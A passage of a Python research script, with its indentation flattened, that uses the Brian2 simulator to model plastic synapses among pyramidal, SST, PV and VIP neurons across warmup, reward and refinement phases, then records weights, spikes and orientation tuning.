Synaptic_model_I = '''w : siemens
gmax_i : siemens
dApre_i/dt = -Apre_i / tau_istdp : siemens (event-driven)
dApost_i/dt = -Apost_i / tau_istdp : siemens (event-driven)
plastic : boolean (shared)'''
# STDP at inhibitory synapses
on_pre_STDP_I = '''g_gaba += w
Apre_i += dApre_i
w = clip(w + plastic*Apost_i, 0*nS, gmax_i)'''
on_post_STDP_I = '''Apost_i += dApost_i
w = clip(w + plastic*Apre_i, 0*nS, gmax_i)'''
# anti-Hebbian STDP at inhibitory synapses
on_pre_antiHebb_I = '''g_gaba += w
Apre_i += dApre_i
w = clip(w - plastic*Apost_i, 0*nS, gmax_i)'''
on_post_antiHebb_I = '''Apost_i += dApost_i
w = clip(w - plastic*Apre_i, 0*nS, gmax_i)'''
"""excitatory synapses"""
# plastic recurrent synapses
con_REC = Synapses(PYR,
PYR,
STDP_E,
on_pre=on_pre_STDP_E,
on_post=on_post_STDP_E,
name='recurrent')
con_REC.connect(p=p.p_PYR_PYR)
con_REC.gmax = p.gmax
con_REC.w = p.recurrent_weights
# SST to PV
con_SOM_PV = Synapses(SOM,
PV,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='som2pv')
con_SOM_PV.connect(p=p.p_SOM_PV)
con_SOM_PV.w = p.SOM2PV_weights
con_SOM_PV.gmax_i = p.gmax_SSTPV
# PYR to PV
con_PYR_PV = Synapses(PYR,
PV,
STDP_E,
on_pre=on_pre_STDP_E,
on_post=on_post_STDP_E,
name='PYR0_PV0')
con_PYR_PV.connect(p=p.p_PYR_PV)
con_PYR_PV.w = w_PYR_PV
con_PYR_PV.gmax = p.w_PYR_PV + relbound * nS
# PC to VIP
con_PYR_VIP = Synapses(PYR,
VIP,
STDP_E,
on_pre=on_pre_STDP_E,
on_post=on_post_STDP_E,
name='PYR0_VIP0')
con_PYR_VIP.connect(p=p.p_PYR_VIP)
con_PYR_VIP.w = w_PYR_VIP
con_PYR_VIP.gmax = p.w_PYR_VIP + relbound * nS
"""inhibitory synapses"""
# SST to PC
con_SOM_PYR = Synapses(SOM,
PYR,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='SOMPYR')
con_SOM_PYR.connect(p=p.p_SOM_PYR)
con_SOM_PYR.w = p.w_SOM_PYR
con_SOM_PYR.gmax_i = p.w_SOM_PYR + relbound * nS
# SST to VIP
con_SOM_VIP = Synapses(SOM,
VIP,
Synaptic_model_I,
on_pre='''g_gaba += w
Apre_i += dApre_i
w = clip(w + plastic*.1*Apost_i, 0*nS, gmax_i)''',
on_post='''Apost_i += dApost_i
w = clip(w + plastic*.1*Apre_i, 0*nS, gmax_i)''',
name='SOMVIP')
con_SOM_VIP.connect(p=p.p_SOM_VIP)
con_SOM_VIP.w = p.w_SOM_VIP
con_SOM_VIP.gmax_i = p.w_SOM_VIP + relbound * nS
#SST to SST
con_SOM_SOM = Synapses(SOM,
SOM,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='SOMSOM')
con_SOM_SOM.connect(p=p.p_SOM_SOM)
con_SOM_SOM.w = p.w_SOM_SOM
con_SOM_SOM.gmax_i = p.w_SOM_SOM + relbound * nS
# PV to PC
con_PV_PYR = Synapses(PV,
PYR,
Synaptic_model_I,
on_pre=on_pre_antiHebb_I,
on_post=on_post_antiHebb_I,
name='PVPYR')
con_PV_PYR.connect(p=p.p_PV_PYR)
con_PV_PYR.w = p.w_PV_PYR
con_PV_PYR.gmax_i = p.w_PV_PYR + relbound * nS
#PV to SST
con_PV_SOM = Synapses(PV,
SOM,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='PVSOM')
con_PV_SOM.connect(p=p.p_PV_SOM)
con_PV_SOM.w = p.w_PV_SOM
con_PV_SOM.gmax_i = p.w_PV_SOM + relbound * nS
#PV to VIP
con_PV_VIP = Synapses(PV,
VIP,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='PVVIP')
con_PV_VIP.connect(p=p.p_PV_VIP)
con_PV_VIP.w = p.w_PV_VIP
con_PV_VIP.gmax_i = p.w_PV_VIP + relbound * nS
#PV to PV
con_PV_PV = Synapses(PV,
PV,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='PVPV')
con_PV_PV.connect(p=p.p_PV_PV)
con_PV_PV.w = p.w_PV_PV
con_PV_PV.gmax_i = p.w_PV_PV + relbound * nS
# VIP to SST
on_pre_VIPSOM = on_pre_antiHebb_I
on_post_VIPSOM = on_post_antiHebb_I
con_VIP_SOM = Synapses(VIP,
SOM,
Synaptic_model_I,
on_pre=on_pre_VIPSOM,
on_post=on_post_VIPSOM,
name='VIPSOM')
con_VIP_SOM.connect(p=p.p_VIP_SOM)
con_VIP_SOM.w = p.w_VIP_SOM
con_VIP_SOM.gmax_i = p.w_VIP_SOM + relbound * nS
# VIP to PC
con_VIP_PYR = Synapses(VIP,
PYR,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='VIPPYR')
con_VIP_PYR.connect(p=p.p_VIP_PYR)
con_VIP_PYR.w = p.w_VIP_PYR
con_VIP_PYR.gmax_i = p.w_VIP_PYR + relbound * nS
# VIP to PV
con_VIP_PV = Synapses(VIP,
PV,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='VIPPV')
con_VIP_PV.connect(p=p.p_VIP_PV)
con_VIP_PV.w = p.w_VIP_PV
con_VIP_PV.gmax_i = p.w_VIP_PV + relbound * nS
# VIP to VIP
con_VIP_VIP = Synapses(VIP,
VIP,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='VIPVIP')
con_VIP_VIP.connect(p=p.p_VIP_VIP)
con_VIP_VIP.w = p.w_VIP_VIP
con_VIP_VIP.gmax_i = p.w_VIP_VIP + relbound * nS
# gap junctions between PVs
PVPV_gap = Synapses(
PV,
PV,
'''w : siemens
Igap_post = w * (v_pre - v_post) : amp (summed)''',
on_pre='Ispikelet+=c_gap',
)
PVPV_gap.connect()
PVPV_gap.w = p.w_gap
# Top down input: reward for stimulus 0 (horizontal, 180 degrees)
TD = NeuronGroup(p.NTD,
model=eqs_neurons,
threshold='v > vt',
reset='v=el',
refractory=2 * ms,
method='euler')
con_ff_td = Synapses(layer4[TUNED_ORI:TUNED_ORI + 1],
TD,
on_pre='g_ampa += 0.3*nS')
con_ff_td.connect(p=p.p_L4_TD)
# top down input goes onto VIP
con_topdown = Synapses(TD, VIP, on_pre='g_ampa += w_TDVIP')
con_topdown.connect(p=p.p_TD_VIP)
store('nonplasticwarmup', filename='checkpoints/test.pkl')
restore('afternoSSTPV', filename='checkpoints/test2.pkl')
Stimmonitor = SpikeMonitor(layer4, variables=['orientation'])
# monitor synaptic weights
monPYRPV = StateMonitor(con_PYR_PV, 'w', record=True, dt=1000 * ms)
monVIPSOM = StateMonitor(con_VIP_SOM, 'w', record=True, dt=1000 * ms)
monVIPPV = StateMonitor(con_VIP_PV, 'w', record=True, dt=1000 * ms)
monVIPPYR = StateMonitor(con_VIP_PYR, 'w', record=True, dt=1000 * ms)
monPVPYR = StateMonitor(con_PV_PYR, 'w', record=True, dt=1000 * ms)
monPVSOM = StateMonitor(con_PV_SOM, 'w', record=True, dt=1000 * ms)
monPVPV = StateMonitor(con_PV_PV, 'w', record=True, dt=1000 * ms)
monPVVIP = StateMonitor(con_PV_VIP, 'w', record=True, dt=1000 * ms)
monSOMVIP = StateMonitor(con_SOM_VIP, 'w', record=True, dt=1000 * ms)
monSOMPYR = StateMonitor(con_SOM_PYR, 'w', record=True, dt=1000 * ms)
monSOMSOM = StateMonitor(con_SOM_SOM, 'w', record=True, dt=1000 * ms)
monPYRSOM1 = StateMonitor(PYR_SOM1, 'w', record=True, dt=1000 * ms)
monPYRSOM2 = StateMonitor(PYR_SOM2, 'w', record=True, dt=1000 * ms)
monPYRSOM3 = StateMonitor(PYR_SOM3, 'w', record=True, dt=1000 * ms)
monPYRSOM4 = StateMonitor(PYR_SOM4, 'w', record=True, dt=1000 * ms)
monPYRVIP = StateMonitor(con_PYR_VIP, 'w', record=True, dt=1000 * ms)
monVIPVIP = StateMonitor(con_VIP_VIP, 'w', record=True, dt=1000 * ms)
# monitor excitatory connections
mona = StateMonitor(con_REC,
'w',
record=con_REC[0:100, 100:400],
dt=100 * ms) # pyr 0 to others
monb = StateMonitor(con_REC,
'w',
record=con_REC[100:400, 0:100],
dt=100 * ms) # other to pyr 0
monc = StateMonitor(con_REC,
'w',
record=con_REC[100:200, 200:400],
dt=100 * ms) # pyr 1 to others
mond = StateMonitor(
con_REC,
'w',
record=con_REC[
'(i>=200) and (i<300) and (((j>=100) and (j<200)) or (j>300))'],
dt=100 * ms) # pyr 2 to others
mone = StateMonitor(con_REC,
'w',
record=con_REC[300:400, 100:300],
dt=100 * ms) # pyr 3 to others
# monitor population rates
PYR1 = PopulationRateMonitor(PYR[0:100])
PYR2 = PopulationRateMonitor(PYR[100:200])
PYR3 = PopulationRateMonitor(PYR[200:300])
PYR4 = PopulationRateMonitor(PYR[300:400])
SOM1 = PopulationRateMonitor(SOM[0:30])
SOM2 = PopulationRateMonitor(SOM[30:60])
SOM3 = PopulationRateMonitor(SOM[60:90])
SOM4 = PopulationRateMonitor(SOM[90:120])
PVmon = PopulationRateMonitor(PV)
VIPmon = PopulationRateMonitor(VIP)
# monitor SST to PV connections
monSOMPV = StateMonitor(con_SOM_PV, 'w', record=True, dt=1000 * ms)
SOM0PV = StateMonitor(con_SOM_PV, 'w', record=con_SOM_PV[:30:10, ::40])
SOMotherPV = StateMonitor(con_SOM_PV,
'w',
record=con_SOM_PV[30::10, 1::40])
# monitor spikes
sm_PYR = SpikeMonitor(PYR)
sm_VIP = SpikeMonitor(VIP)
sm_SOM = SpikeMonitor(SOM)
sm_PV = SpikeMonitor(PV)
sm_TD = SpikeMonitor(TD)
sm_layer4 = SpikeMonitor(layer4)
sm_FF = SpikeMonitor(FF)
sm_gap = SpikeMonitor(gapfiller)
# run without plasticity
defaultclock.dt = p.timestep
con_ff_td.active = False
TD.active = False
con_REC.plastic = False
con_SOM_PV.plastic = False
con_PYR_PV.plastic = False
PYR_SOM1.plastic = False
PYR_SOM2.plastic = False
PYR_SOM3.plastic = False
PYR_SOM4.plastic = False
con_PYR_VIP.plastic = False
con_VIP_SOM.plastic = False
con_VIP_PV.plastic = False
con_VIP_VIP.plastic = False
con_VIP_PYR.plastic = False
con_SOM_PYR.plastic = False
con_SOM_VIP.plastic = False
con_SOM_SOM.plastic = False
con_PV_SOM.plastic = False
con_PV_PYR.plastic = False
con_PV_VIP.plastic = False
con_PV_PV.plastic = False
conREC_start = np.copy(con_REC.w[:])
run(p.nonplasticwarmup_simtime, report='text')
store('nonplasticwarmup')
print('non-plastic warmup done')
# plastic warmup
restore('nonplasticwarmup')
con_ff_td.active = False
TD.active = False
con_REC.plastic = True
con_SOM_PV.plastic = True
if p.restplastic == True:
con_VIP_SOM.plastic = True
con_PYR_PV.plastic = True
con_PV_PYR.plastic = True
con_PYR_VIP.plastic = True
PYR_SOM1.plastic = True
PYR_SOM2.plastic = True
PYR_SOM3.plastic = True
PYR_SOM4.plastic = True
con_VIP_PV.plastic = True
con_VIP_VIP.plastic = True
con_VIP_PYR.plastic = True
con_SOM_PYR.plastic = True
con_SOM_VIP.plastic = True
con_SOM_SOM.plastic = True
con_PV_SOM.plastic = True
con_PV_VIP.plastic = True
con_PV_PV.plastic = True
else:
con_PYR_PV.plastic = False
PYR_SOM1.plastic = False
PYR_SOM2.plastic = False
PYR_SOM3.plastic = False
PYR_SOM4.plastic = False
con_PYR_VIP.plastic = False
con_VIP_SOM.plastic = False
con_VIP_PV.plastic = False
con_VIP_VIP.plastic = False
con_VIP_PYR.plastic = False
con_SOM_PYR.plastic = False
con_SOM_VIP.plastic = False
con_SOM_SOM.plastic = False
con_PV_SOM.plastic = False
con_PV_PYR.plastic = False
con_PV_VIP.plastic = False
con_PV_PV.plastic = False
print('starting warmup')
run(p.warmup_simtime, report='text')
conREC_afterwarmup = np.copy(con_REC.w[:])
sstpv_w_afterwarmup = np.copy(con_SOM_PV.w[:])
store('afterwarmup')
print('warmup done')
# rewarded phase
restore('afterwarmup')
con_ff_td.active = True
TD.active = True
con_REC.plastic = True
con_SOM_PV.plastic = True
print('starting reward period')
run(p.reward_simtime, report='text')
impact_afterreward, impactmax_afterreward = calc_impact(con_REC.w)
print('calculated impacts')
conREC_afterreward = np.copy(con_REC.w[:])
print('copied con_Rec')
sstpv_w_afterreward = np.copy(con_SOM_PV.w[:])
print('copied sstpv')
store('afterreward')
print('rewarded phase done')
# refinement phase
restore('afterreward')
con_SOM_PV.plastic = True
con_ff_td.active = False
con_topdown.active = False
TD.active = False
print('starting refinement phase')
run(p.noreward_simtime, report='text')
store('afternoreward')
print('45s of refinement phase done')
# refinement phase, option to kill SST-PV structure
restore('afternoreward')
# For Suppl. Fig. kill inhibitory weight structure:
# con_SOM_PV.w_i = p.SOM2PV_weights
con_ff_td.active = False
TD.active = False
con_REC.plastic = True
con_SOM_PV.plastic = True
run(p.noSSTPV_simtime, report='text')
store('afternoSSTPV')
print('refinement phase done')
# final non-plastic phase to measure tuning
restore('afternoSSTPV')
con_ff_td.active = False
TD.active = False
con_REC.plastic = False
con_SOM_PV.plastic = False
con_PYR_PV.plastic = False
PYR_SOM1.plastic = False
PYR_SOM2.plastic = False
PYR_SOM3.plastic = False
PYR_SOM4.plastic = False
con_PYR_VIP.plastic = False
con_VIP_SOM.plastic = False
con_VIP_PV.plastic = False
con_VIP_VIP.plastic = False
con_VIP_PYR.plastic = False
con_SOM_PYR.plastic = False
con_SOM_VIP.plastic = False
con_SOM_SOM.plastic = False
con_PV_SOM.plastic = False
con_PV_PYR.plastic = False
con_PV_VIP.plastic = False
con_PV_PV.plastic = False
run(p.after_simtime, report='text')
# get spiking information
PYR_spiketrains = sm_PYR.spike_trains()
SOM_spiketrains = sm_SOM.spike_trains()
VIP_spiketrains = sm_VIP.spike_trains()
PV_spiketrains = sm_PV.spike_trains()
stimuli_t = Stimmonitor.t
PYRi, PYRt = sm_PYR.it
SSTi, SSTt = sm_SOM.it
PVi, PVt = sm_PV.it
VIPi, VIPt = sm_VIP.it
gapi, gapt = sm_gap.it
'''
results = {
'SOM0PV': SOM0PV.w,
'SOMotherPV': SOMotherPV.w,
'weights_rec': con_REC.w[:],
'weights_rec_afterwarmup': conREC_afterwarmup,
'weights_rec_afterreward': conREC_afterreward,
'weights_rec_start': conREC_start,
'weights_rec_i': con_REC.i[:],
'weights_rec_j': con_REC.j[:],
'weights_sst_pv': con_SOM_PV.w[:],
'weights_sst_pv_afterreward': sstpv_w_afterreward,
'weights_sst_pv_afterwarmup': sstpv_w_afterwarmup,
't': PYR1.t[:],
'SOMPV_t': monSOMPV.t[:],
'SOMPV_w': monSOMPV.w[:],
'SOMPV_t': monSOMPV.t[:],
'SOMPV_w': monSOMPV.w[:],
'PYRPV_w': monPYRPV.w[:],
'PYRVIP_w': monPYRVIP.w[:],
'PVPYR_w': monPVPYR.w[:],
'PVPV_w': monPVPV.w[:],
'PVSOM_w': monPVSOM.w[:],
'PVVIP_w': monPVVIP.w[:],
'VIPSOM_w': monVIPSOM.w[:],
'VIPPYR_w': monVIPPYR.w[:],
'VIPPV_w': monVIPPV.w[:],
'VIPVIP_w': monVIPVIP.w[:],
'SOMVIP_w': monSOMVIP.w[:],
'SOMPYR_w': monSOMPYR.w[:],
'SOMSOM_w': monSOMSOM.w[:],
'PYRSOM1_w': monPYRSOM1.w[:],
'PYRSOM2_w': monPYRSOM2.w[:],
'PYRSOM3_w': monPYRSOM3.w[:],
'PYRSOM4_w': monPYRSOM4.w[:],
'PYR0toothers': mona.w,
'otherstoPYR0': monb.w,
'PYR1toothers': monc.w,
'PYR2toothers': mond.w,
'PYRi': PYRi[:],
'PYRt': PYRt[:],
'SSTi': SSTi[:],
'SSTt': SSTt[:],
'PVi': PVi[:],
'PVt': PVt[:],
'VIPi': VIPi[:],
'VIPt': VIPt[:],
'Pyr1rate': PYR1.smooth_rate(window='flat', width=0.5 * ms),
'Pyr2rate': PYR2.smooth_rate(window='flat', width=0.5 * ms),
'Pyr3rate': PYR3.smooth_rate(window='flat', width=0.5 * ms),
'Pyr4rate': PYR4.smooth_rate(window='flat', width=0.5 * ms),
'SOM1rate': SOM1.smooth_rate(window='flat', width=0.5 * ms),
'SOM2rate': SOM2.smooth_rate(window='flat', width=0.5 * ms),
'SOM3rate': SOM3.smooth_rate(window='flat', width=0.5 * ms),
'SOM4rate': SOM4.smooth_rate(window='flat', width=0.5 * ms),
'PVrate': PVmon.smooth_rate(window='flat', width=0.5 * ms),
}
'''
results = {
'PYR_spike_train': PYR_spiketrains,
'SOM_spike_train': SOM_spiketrains,
'VIP_spike_train': VIP_spiketrains
}
# create a temporary directory into which we will store all files
# it will be placed into the current directory but this can be changed
# this temporary directory will automatically be deleted as soon as the with statement ends
# lets create a filename for storing some data
results_file = RESULTS_DIR + f'/results_tuned{TUNED_ORI}_1.pkl'
print('Saving results to: ' + results_file)
if not os.path.exists(RESULTS_DIR):
os.mkdir(RESULTS_DIR)
with open(results_file, 'wb') as f:
pickle.dump(results, f)
# Data postprocessing
# calculate impact of pyr0 onto others in weight matrix
impact, impactmax = calc_impact(con_REC.w)
'''
PVrate_initial = get_firingrate(PV_spiketrains, 0 * second,
p.nonplasticwarmup_simtime)
PVrate_TD = get_firingrate(PV_spiketrains, total_warmup_simtime,
total_warmup_simtime + p.reward_simtime)
'''
no_stimuli = 4
# get tuning for all populations to first and last presentation of each stimulus in entire simulation:
'''
tuning_before, tuning_after = get_tuning(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t, no_stimuli)
firstSOM, lastSOM = get_tuning(SOM_spiketrains, Stimmonitor.orientation,
Stimmonitor.t, no_stimuli)
firstVIP, lastVIP = get_tuning(VIP_spiketrains, Stimmonitor.orientation,
Stimmonitor.t, no_stimuli)
firstPV, lastPV = get_tuning(PV_spiketrains, Stimmonitor.orientation,
Stimmonitor.t, no_stimuli)
'''
reward_endtime = total_warmup_simtime + p.reward_simtime #/p.timestep
# get times of all stimuli during particular phases of the simulation:
# in the very beginning (first), endofreward, startofnonreward, and at the very end (last)
first, endofreward, startofnonreward, last = get_particular_stimulus_times(
Stimmonitor.orientation, Stimmonitor.t, no_stimuli, reward_endtime,
reward_endtime)
tuning_rewardend = get_spike_response(PYR_spiketrains,
no_stimuli,
p.input_time,
last=endofreward)
tuning_after_rewardend = get_spike_response(PYR_spiketrains,
no_stimuli,
p.input_time,
first=startofnonreward)
# get tuning average over all stimulus presentations over a period of time
tuning_initial = get_tuning_avgoverperiod(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
tuning_afterwarmup = get_tuning_avgoverperiod(
PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime - p.nonplasticwarmup_simtime,
upto=total_warmup_simtime)
tuning_duringreward = get_tuning_avgoverperiod(
PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime -
p.nonplasticwarmup_simtime,
upto=total_warmup_simtime + p.reward_simtime)
tuning_afterreward = get_tuning_avgoverperiod(
PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_warmup_simtime + p.reward_simtime +
p.nonplasticwarmup_simtime)
tuning_final = get_tuning_avgoverperiod(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
stimtuning_initial = get_tuning_avgoverperiod(
PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
stim_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
stimtuning_final = get_tuning_avgoverperiod(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
stim_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
stimPVtuning_initial = get_tuning_avgoverperiod(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
stim_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
stimPVtuning_final = get_tuning_avgoverperiod(PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
stim_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
PVtuning_initial = get_tuning_avgoverperiod(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
PVtuning_afterwarmup = get_tuning_avgoverperiod(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime - p.nonplasticwarmup_simtime,
upto=total_warmup_simtime)
PVtuning_duringreward = get_tuning_avgoverperiod(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime -
p.nonplasticwarmup_simtime,
upto=total_warmup_simtime + p.reward_simtime)
PVtuning_afterreward = get_tuning_avgoverperiod(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_warmup_simtime + p.reward_simtime +
p.nonplasticwarmup_simtime)
PVtuning_final = get_tuning_avgoverperiod(PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
VIPtuning_initial = get_tuning_avgoverperiod(
VIP_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
VIPtuning_afterwarmup = get_tuning_avgoverperiod(
VIP_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime - p.nonplasticwarmup_simtime,
upto=total_warmup_simtime)
VIPtuning_duringreward = get_tuning_avgoverperiod(
VIP_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime -
p.nonplasticwarmup_simtime,
upto=total_warmup_simtime + p.reward_simtime)
VIPtuning_afterreward = get_tuning_avgoverperiod(
VIP_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_warmup_simtime + p.reward_simtime +
p.nonplasticwarmup_simtime)
VIPtuning_final = get_tuning_avgoverperiod(VIP_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
SOMtuning_initial = get_tuning_avgoverperiod(
SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
SOMtuning_afterwarmup = get_tuning_avgoverperiod(
SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime - p.nonplasticwarmup_simtime,
upto=total_warmup_simtime)
SOMtuning_duringreward = get_tuning_avgoverperiod(
SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime -
p.nonplasticwarmup_simtime,
upto=total_warmup_simtime + p.reward_simtime)
SOMtuning_afterreward = get_tuning_avgoverperiod(
SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_warmup_simtime + p.reward_simtime +
p.nonplasticwarmup_simtime)
SOMtuning_final = get_tuning_avgoverperiod(SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
PYRData_reward = get_spiketrains_foreachstim(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime,
upto=total_warmup_simtime +
p.reward_simtime)
PYRData = get_spiketrains_foreachstim(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=0 * second,
upto=total_simtime)
SSTData_reward = get_spiketrains_foreachstim(SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime,
upto=total_warmup_simtime +
p.reward_simtime)
SSTData = get_spiketrains_foreachstim(SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=0 * second,
upto=total_simtime)
PVData_reward = get_spiketrains_foreachstim(PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime,
upto=total_warmup_simtime +
p.reward_simtime)
PVData = get_spiketrains_foreachstim(PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=0 * second,
upto=total_simtime)
PYRData_afterreward = get_spiketrains_foreachstim(
PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_simtime - p.after_simtime)
SSTData_afterreward = get_spiketrains_foreachstim(
SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_simtime - p.after_simtime)
PVData_afterreward = get_spiketrains_foreachstim(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_simtime - p.after_simtime)
try:
currentratio_initial, currentratiomean_initial, ampE_initial, ampI_initial, amp2Ei, amp2Ii, amp3Ei, amp3Ii = get_currentratio_foreachstim(
currents,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime - p.nonplasticwarmup_simtime,
upto=total_warmup_simtime)
currentratio_final, currentratiomean_final, ampE_final, ampI_final, amp2Ef, amp2If, amp3Ef, amp3If = get_currentratio_foreachstim(
currents,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_simtime - p.after_simtime,
upto=total_simtime)
except:
currentratio_initial = []
currentratiomean_initial = []
ampE_initial = []
ampI_initial = []
amp2Ei = []
amp2Ii = []
amp3Ei = []
amp3Ii = []
currentratio_final = []
currentratiomean_final = []
ampE_final = []
ampI_final = []
amp2Ef = []
amp2If = []
amp3Ef = []
amp3If = []
results = {
'impact': impact,
'impact_aftereward': impactmax_afterreward,
'impactmax': impact,
'impactmax_aftereward': impactmax_afterreward,
'SOM0PV': SOM0PV.w,
'SOMotherPV': SOMotherPV.w,
'weights_rec': con_REC.w[:],
'weights_rec_afterwarmup': conREC_afterwarmup,
'weights_rec_afterreward': conREC_afterreward,
'weights_rec_start': conREC_start,
'weights_rec_i': con_REC.i[:],
'weights_rec_j': con_REC.j[:],
'weights_sst_pv': con_SOM_PV.w[:],
'weights_sst_pv_afterwarmup': sstpv_w_afterwarmup,
'weights_sst_pv_afterreward': sstpv_w_afterreward,
'stimtuning_initial': stimtuning_initial,
'stimtuning_final': stimtuning_final,
'stimPVtuning_initial': stimPVtuning_initial,
'stimPVtuning_final': stimPVtuning_final,
't': PYR1.t[:],
'tuning_initial': tuning_initial,
'tuning_final': tuning_final,
'tuning_afterwarmup': tuning_afterwarmup,
'tuning_rewardend': tuning_duringreward,
'tuning_after_rewardend': tuning_afterreward,
'PVtuning_initial': PVtuning_initial,
'PVtuning_final': PVtuning_final,
'PVtuning_afterwarmup': PVtuning_afterwarmup,
'PVtuning_rewardend': PVtuning_duringreward,
'PVtuning_after_rewardend': PVtuning_afterreward,
'VIPtuning_initial': VIPtuning_initial,
'VIPtuning_final': VIPtuning_final,
'VIPtuning_afterwarmup': VIPtuning_afterwarmup,
'VIPtuning_rewardend': VIPtuning_duringreward,
'VIPtuning_after_rewardend': VIPtuning_afterreward,
'SOMtuning_initial': SOMtuning_initial,
'SOMtuning_final': SOMtuning_final,
'SOMtuning_rewardend': SOMtuning_duringreward,
'SOMtuning_after_rewardend': SOMtuning_afterreward,
'SOMPV_t': monSOMPV.t[:],
'SOMPV_w': monSOMPV.w[:],
'PYRPV_w': monPYRPV.w[:],
#'PYRSOM_w' : monPYRSOM.w[:],
'PYRVIP_w': monPYRVIP.w[:],
'PVPYR_w': monPVPYR.w[:],
'PVPV_w': monPVPV.w[:],
'PVSOM_w': monPVSOM.w[:],
'PVVIP_w': monPVVIP.w[:],
'VIPSOM_w': monVIPSOM.w[:],
'VIPPYR_w': monVIPPYR.w[:],
'VIPPV_w': monVIPPV.w[:],
'VIPVIP_w': monVIPVIP.w[:],
'SOMVIP_w': monSOMVIP.w[:],
'SOMPYR_w': monSOMPYR.w[:],
'SOMSOM_w': monSOMSOM.w[:],
'PYRSOM1_w': monPYRSOM1.w[:],
'PYRSOM2_w': monPYRSOM2.w[:],
'PYRSOM3_w': monPYRSOM3.w[:],
